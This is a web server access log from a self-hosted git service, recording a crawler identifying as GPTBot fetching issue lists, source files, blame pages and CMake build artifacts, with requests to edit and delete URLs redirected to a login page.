"/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:53:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13801] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12601] [Gzip 5.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13780] [Gzip 7.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16376] [Gzip 9.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=open&type=all" +[17/Feb/2026:18:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?state=closed&type=all" [Client 74.7.227.38] [Length 9931] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:18:53:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:53:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:53:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:53:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:53:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:53:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:53:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15123] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:53:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:53:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:53:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13728] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:18:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" 